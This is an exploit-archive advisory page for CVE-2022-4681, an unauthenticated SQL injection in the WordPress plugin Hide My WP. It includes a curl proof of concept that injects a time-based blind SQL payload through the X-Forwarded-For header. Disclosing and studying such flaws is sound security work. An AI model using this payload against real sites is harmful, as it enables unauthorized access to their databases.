WordPress Hide My WP SQL Injection

2024.03.11

Credit: Xenofon Vassilakopoulos

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2022-4681

CWE: CWE-89

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)
## Description
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
## Proof of Concept
curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Hide My WP SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.